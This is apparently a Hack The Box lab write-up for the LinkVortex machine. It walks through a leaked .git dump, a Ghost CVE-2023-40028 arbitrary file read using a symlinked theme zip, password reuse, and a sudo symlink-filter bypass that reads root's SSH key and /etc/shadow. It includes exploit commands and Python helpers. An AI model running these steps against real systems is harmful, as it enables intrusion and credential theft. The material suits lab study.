HTB-LinkVortex

Box Info

Difficulty Easy
OS Linux
IP Address 10.10.11.47

Port Scanning

# Check all open TCP
sudo rustscan 10.10.11.47 -r 1-65535 --ulimit 5000
# Nmap scan with script on open TCP port
sudo nmap 10.10.11.47 -sCV -Pn -sT -p 22,80
# Nmap scan vulnerability
sudo nmap -sT -p 22,80 --script=vuln -O -Pn 10.10.11.47
# Nmap scan with UDP port
sudo nmap -sU --top-ports 20 -Pn 10.10.11.47

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb (ECDSA)
|_ 256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13 (ED25519)
80/tcp open http Apache httpd
|_http-title: Did not follow redirect to http://linkvortex.htb/
|_http-server-header: Apache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Update DNS

sudo nano /etc/hosts
10.10.11.47 linkvortex.htb

Service Enumeration

Port 80


Directory Buster

dirsearch -u linkvortex.htb -t 50 -i 200
...
[01:34:23] 200 - 15KB - /favicon.ico
[01:34:30] 200 - 1KB - /LICENSE
[01:34:42] 200 - 103B - /robots.txt
[01:34:44] 200 - 258B - /sitemap.xml
...

Check robots.txt

curl -L http://linkvortex.htb/robots.txt
User-agent: *
Sitemap: http://linkvortex.htb/sitemap.xml
Disallow: /ghost/
Disallow: /p/
Disallow: /email/
Disallow: /r/

Access to ghost

http[:]//linkvortex[.]htb/ghost/#/signin is the Ghost admin login form. The default guess admin:admin does not work, so we need real credentials before this panel is useful.


Subdomain Buster

ffuf -u http://linkvortex.htb/ -H "Host:FUZZ.linkvortex.htb"  -mc 200 -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt
...
dev [Status: 200, Size: 2538, Words: 670, Lines: 116, Duration: 39ms]
...

Found the dev subdomain; add it to /etc/hosts as well (10.10.11.47 dev.linkvortex.htb).

http[:]//dev[.]linkvortex[.]htb/


dirsearch -u dev.linkvortex.htb -t 50 -i 200
...
[01:39:43] 200 - 557B - /.git/
[01:39:43] 200 - 201B - /.git/config
[01:39:43] 200 - 73B - /.git/description
[01:39:43] 200 - 41B - /.git/HEAD
[01:39:43] 200 - 620B - /.git/hooks/
[01:39:43] 200 - 240B - /.git/info/exclude
[01:39:43] 200 - 401B - /.git/logs/
[01:39:43] 200 - 402B - /.git/info/
[01:39:43] 200 - 147B - /.git/packed-refs
[01:39:43] 200 - 418B - /.git/objects/
[01:39:43] 200 - 393B - /.git/refs/
[01:39:43] 200 - 175B - /.git/logs/HEAD
[01:39:43] 200 - 691KB - /.git/index
...

Scanning the dev subdomain shows that the whole .git directory is exposed over HTTP, so the repository (and its history) can be reconstructed from the leaked objects.

GitHack

Since the .git directory is leaked on the dev subdomain, dump the repository with GitHack:

https://github.com/lijiejie/GitHack

python3 GitHack.py http://dev.linkvortex.htb/.git/


Inside the dumped repository there are several user credentials.


The commit author tells us the account name is admin (admin@linkvortex.htb), and one of the JS test files contains a list of passwords; the one that works against /ghost/ is OctopiFociPilfer45, used in the next section.

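To make clear what a dumper like GitHack does with a leaked .git/, here is an added example written for this page (it is not GitHack's code): the loose-object format Git stores on disk, a walker that rebuilds every file of a commit from those objects, and a self-check against a small repository constructed in memory. The `fetch` callable is the only thing to swap for an HTTP GET of `http://dev.linkvortex.htb/.git/objects/<sha[:2]>/<sha[2:]>`; the commit hash itself comes from .git/HEAD and the ref it names. Objects stored in packfiles (the leak above also exposes packed-refs) are not handled here.

```python
import hashlib
import zlib
from typing import Callable


def git_object(kind: str, payload: bytes) -> tuple[str, bytes]:
    """Encode a loose object the way git does: '<type> <size>\\0<payload>',
    SHA-1 over that, zlib-compressed on disk under objects/xx/yyyy..."""
    raw = f"{kind} {len(payload)}\0".encode() + payload
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)


def parse_object(compressed: bytes) -> tuple[str, bytes]:
    raw = zlib.decompress(compressed)
    header, _, body = raw.partition(b"\0")
    kind, size = header.decode().split(" ")
    if len(body) != int(size):
        raise ValueError("size mismatch: corrupt or truncated object")
    return kind, body


def parse_tree(body: bytes) -> list[tuple[str, str, str]]:
    """A tree body is a sequence of '<mode> <name>\\0' + 20 raw SHA-1 bytes."""
    entries, i = [], 0
    while i < len(body):
        nul = body.index(b"\0", i)
        mode, name = body[i:nul].decode().split(" ", 1)
        entries.append((mode, name, body[nul + 1:nul + 21].hex()))
        i = nul + 21
    return entries


def dump_commit(fetch: Callable[[str], bytes], commit_sha: str) -> dict[str, bytes]:
    """Walk commit -> root tree -> subtrees -> blobs and return {path: bytes}.
    `fetch(sha)` must return the compressed object; against a live leak that
    is the body of GET /.git/objects/<sha[:2]>/<sha[2:]>."""
    kind, body = parse_object(fetch(commit_sha))
    if kind != "commit":
        raise ValueError(f"{commit_sha} is a {kind}, not a commit")
    root_sha = body.split(b"\n", 1)[0].split(b" ", 1)[1].decode()
    files: dict[str, bytes] = {}

    def walk(tree_sha: str, prefix: str) -> None:
        _, tree_body = parse_object(fetch(tree_sha))
        for mode, name, child in parse_tree(tree_body):
            if mode == "40000":                      # subdirectory
                walk(child, f"{prefix}{name}/")
            else:                                    # 100644 / 100755 / 120000
                files[f"{prefix}{name}"] = parse_object(fetch(child))[1]

    walk(root_sha, "")
    return files


def sample_repo() -> tuple[dict[str, bytes], str]:
    """Constructed stand-in for a leaked object store (not the real repository)."""
    store: dict[str, bytes] = {}

    def put(kind: str, payload: bytes) -> str:
        sha, blob = git_object(kind, payload)
        store[sha] = blob
        return sha

    readme = put("blob", b"# dev site\n")
    cfg = put("blob", b'{"admin_password": "example-only"}\n')   # constructed value
    core = put("tree", b"100644 config.json\0" + bytes.fromhex(cfg))
    root = put("tree", b"100644 README.md\0" + bytes.fromhex(readme)
               + b"40000 core\0" + bytes.fromhex(core))
    commit = put("commit", f"tree {root}\n".encode()
                 + b"author dev <dev@linkvortex.htb> 0 +0000\n"
                 + b"committer dev <dev@linkvortex.htb> 0 +0000\n\ninitial\n")
    return store, commit


if __name__ == "__main__":
    store, head = sample_repo()
    for path, content in dump_commit(store.__getitem__, head).items():
        print(path, content)
```

Against a real leak, directory listing is not even required: every object is addressed by its hash, so HEAD, the ref it points at, and the commit's tree are enough to enumerate all files without guessing paths.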

Arbitrary File Read

The dumped repository also reveals the Ghost version in use, 5.58.0. Ghost versions up to and including 5.59.0 (fixed in 5.59.1) are affected by CVE-2023-40028: an authenticated user can upload a theme archive containing symlinks, which gives an arbitrary file read of any file the Ghost process can reach, served through the theme's URL. The advisory notes that site administrators can check for exploitation by looking for unknown symlinks within Ghost's content/ folder. Because the bug needs a valid login, the admin credential recovered from the repository is exactly what makes it usable here.


https://github.com/TryGhost/Ghost/security/advisories/GHSA-9c9v-w225-v5rg

https://github.com/0xDTC/Ghost-5.58-Arbitrary-File-Read-CVE-2023-40028

Let's try the exploit script from that repository with the admin credential found in the dump:

./CVE-2023-40028 -u admin@linkvortex.htb -p OctopiFociPilfer45 -h http://linkvortex.htb

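What the exploit script actually uploads, as an added example (not from this page, from Ghost, or from the 0xDTC script): a theme zip in which one member carries the Unix symlink mode, with the link target as its body, plus the check a hardened theme importer must run over the archive before writing anything to disk. The theme name `evil` and member name `config.txt` are made up for the demonstration.

```python
import io
import stat
import zipfile


def build_symlink_theme_zip(theme: str, member: str, target: str) -> bytes:
    """Build the kind of archive CVE-2023-40028 relies on (constructed here for
    illustration): a minimal theme plus one member whose mode says 'symlink'.
    An extractor that honours the mode creates a real symlink under
    content/themes/<theme>/, and the link target is then served as theme content."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{theme}/package.json",
                    '{"name": "%s", "version": "1.0.0"}' % theme)
        link = zipfile.ZipInfo(f"{theme}/{member}")
        link.create_system = 3                        # Unix: external_attr carries st_mode
        link.external_attr = (stat.S_IFLNK | 0o777) << 16
        zf.writestr(link, target)                     # a symlink entry's data is its target
    return buf.getvalue()


def find_unsafe_members(zip_bytes: bytes) -> list[tuple[str, str]]:
    """What a hardened importer checks before extraction: refuse symlink
    entries, absolute names and '..' components. Returns (member, reason)."""
    unsafe = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            mode = info.external_attr >> 16
            if stat.S_ISLNK(mode):
                unsafe.append((info.filename,
                               "symlink -> " + zf.read(info).decode(errors="replace")))
            elif info.filename.startswith("/") or ".." in info.filename.split("/"):
                unsafe.append((info.filename, "path escapes the theme directory"))
    return unsafe


if __name__ == "__main__":
    archive = build_symlink_theme_zip("evil", "config.txt",
                                      "/var/lib/ghost/config.production.json")
    for member, reason in find_unsafe_members(archive):
        print(f"refuse {member}: {reason}")
```

Note that Python's own `zipfile.extractall` does not create symlinks (it writes the target string as a regular file), so the archive is harmless to this script; the extractor Ghost used at the time did honour the mode, which is the whole bug. Rejecting the entry up front, rather than trusting the extractor, is the portable fix.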

Back in the dumped repository, Dockerfile.ghost references the production configuration file, which tells us where the live secrets are kept.


We can use the arbitrary file read to fetch that file:

/var/lib/ghost/config.production.json
Enter the file path to read (or type 'exit' to quit): /home/node/user.txt
File content:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Not Found</pre>
</body>
</html>
Enter the file path to read (or type 'exit' to quit): /home/node/.ssh/authorized_keys
File content:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Not Found</pre>
</body>
</html>
Enter the file path to read (or type 'exit' to quit): /var/lib/ghost/config.production.json
File content:
{
  "url": "http://localhost:2368",
  "server": {
    "port": 2368,
    "host": "::"
  },
  "mail": {
    "transport": "Direct"
  },
  "logging": {
    "transports": ["stdout"]
  },
  "process": "systemd",
  "paths": {
    "contentPath": "/var/lib/ghost/content"
  },
  "spam": {
    "user_login": {
      "minWait": 1,
      "maxWait": 604800000,
      "freeRetries": 5000
    }
  },
  "mail": {
    "transport": "SMTP",
    "options": {
      "service": "Google",
      "host": "linkvortex.htb",
      "port": 587,
      "auth": {
        "user": "bob@linkvortex.htb",
        "pass": "fibber-talented-worth"
      }
    }
  }
}

The two Not Found pages mean that /home/node/user.txt and /home/node/.ssh/authorized_keys simply do not exist on the filesystem Ghost sees (it runs inside the container described by Dockerfile.ghost), not that the read was blocked. The production config, by contrast, hands us SMTP credentials: bob@linkvortex.htb:fibber-talented-worth. The same password turns out to be reused for bob's SSH login on the host.

Initiate User Foothold

ssh bob@linkvortex.htb


Privilege Escalation

Sudo privilege escalation


sudo -l shows that bob may run /usr/bin/bash /opt/ghost/clean_symlink.sh as root with a .png path as argument. The script is meant to clean up symlinks, and its contents are:

#!/bin/bash

QUAR_DIR="/var/quarantined"

if [ -z $CHECK_CONTENT ];then
  CHECK_CONTENT=false
fi

LINK=$1

if ! [[ "$LINK" =~ \.png$ ]]; then
  /usr/bin/echo "! First argument must be a png file !"
  exit 2
fi

if /usr/bin/sudo /usr/bin/test -L $LINK;then
  LINK_NAME=$(/usr/bin/basename $LINK)
  LINK_TARGET=$(/usr/bin/readlink $LINK)
  if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
    /usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
    /usr/bin/unlink $LINK
  else
    /usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
    /usr/bin/mv $LINK $QUAR_DIR/
    if $CHECK_CONTENT;then
      /usr/bin/echo "Content:"
      /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
    fi
  fi
fi

Two things in /opt/ghost/clean_symlink.sh are under bob's control while it runs as root. First, the environment variable CHECK_CONTENT: when it is true, the quarantined link is cat'ed, so whatever the link ultimately resolves to is printed back to us (this only works because the sudo rule lets CHECK_CONTENT through, otherwise sudo would refuse the VAR=value form used below). Second, the only protection for sensitive targets is a grep for `etc` or `root` on the output of `readlink`, which resolves a single level: a link that points at another link is judged by the intermediate path, never by the final target. Note also that the link is moved into /var/quarantined before it is read, so any intermediate link must be referenced by an absolute path or it dangles after the move.

A direct link is caught by the filter, because /etc/shadow contains `etc`, and the script simply unlinks it:

ln -s /etc/shadow cute.png
sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh cute.png

Initiate Root Foothold

Chaining two links gets past the filter: cute.png points at /home/bob/cute.txt, a path containing neither `etc` nor `root`, and cute.txt points at /root/.ssh/id_rsa. The inner path is absolute on purpose, since cute.png is moved to /var/quarantined before cat follows it.

ln -s /root/.ssh/id_rsa cute.txt
ln -s /home/bob/cute.txt cute.png
export CHECK_CONTENT=true
sudo /usr/bin/bash /opt/ghost/clean_symlink.sh cute.png
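The difference between what the script checks and what is actually read, as an added Python model written for this page (the commands above are the real exploit; this is not the page's code): `script_verdict` mirrors the one-level readlink plus grep, while `hardened_verdict` resolves the whole chain and confines the final target to an allow-listed directory. The links are created in a temporary directory standing in for /home/bob; the `/root/.ssh/id_rsa` target does not need to exist for the resolution to be visible.

```python
import os
import re
import tempfile

CRITICAL = re.compile(r"(etc|root)")   # the script's grep -E '(etc|root)'


def script_verdict(link: str) -> str:
    """Mirror clean_symlink.sh: .png check, one-level readlink, grep on it."""
    if not link.endswith(".png"):
        return "reject"
    if not os.path.islink(link):
        return "ignore"
    target = os.readlink(link)            # one hop only, like /usr/bin/readlink
    if CRITICAL.search(target):
        return "unlink"
    return "quarantine"                   # cat'ed when CHECK_CONTENT=true


def hardened_verdict(link: str, allowed_root: str) -> str:
    """Same flow, but judge the final target (readlink -f semantics) and
    require it to live under allowed_root instead of grepping for words."""
    if not link.endswith(".png") or not os.path.islink(link):
        return script_verdict(link)
    final = os.path.realpath(link)        # follows every hop, even if target is missing
    if os.path.commonpath([final, allowed_root]) != allowed_root:
        return "unlink"
    return "quarantine"


def demo(secret: str = "/root/.ssh/id_rsa") -> dict[str, tuple[str, str]]:
    """Recreate both attempts from the box in a scratch directory."""
    with tempfile.TemporaryDirectory() as scratch:
        home = os.path.realpath(scratch)            # stands in for /home/bob
        direct = os.path.join(home, "direct.png")   # ln -s /root/.ssh/id_rsa direct.png
        os.symlink(secret, direct)
        hop = os.path.join(home, "cute.txt")        # ln -s /root/.ssh/id_rsa cute.txt
        os.symlink(secret, hop)
        double = os.path.join(home, "cute.png")     # ln -s /home/bob/cute.txt cute.png
        os.symlink(hop, double)                     # absolute: survives the mv to quarantine
        return {
            "direct": (script_verdict(direct), hardened_verdict(direct, home)),
            "double": (script_verdict(double), hardened_verdict(double, home)),
        }


if __name__ == "__main__":
    for name, (original, hardened) in demo().items():
        print(f"{name:7s} script={original:10s} hardened={hardened}")
```

The hardened variant still quarantines links that stay inside the allowed directory, so the script's intended job is unchanged; it only stops judging a path by whether the words `etc` or `root` appear in one hop of it.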

id_rsa

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1r....
-----END OPENSSH PRIVATE KEY-----

SSH Access

chmod 600 id_rsa
ssh -i id_rsa root@linkvortex.htb


/etc/shadow

root:$y$j9T$C3zg87gHwrCXO0vl4igIh/$iisf9sVwilKAi7mI5p1FqQslJWM9t2.YUWznIPC/XIA:19814:0:99999:7:::
bob:$6$rounds=656000$4p3mw8hAd9ir.25f$ocGm9nW1TM2AB8Z.l0K.hi43bOrm3oxQsaKFACMoS2UL.tIXxSW3u/xsClrvkEhP5s.GUpdIvCX3qRtppDV8r.:19814:0:99999:7:::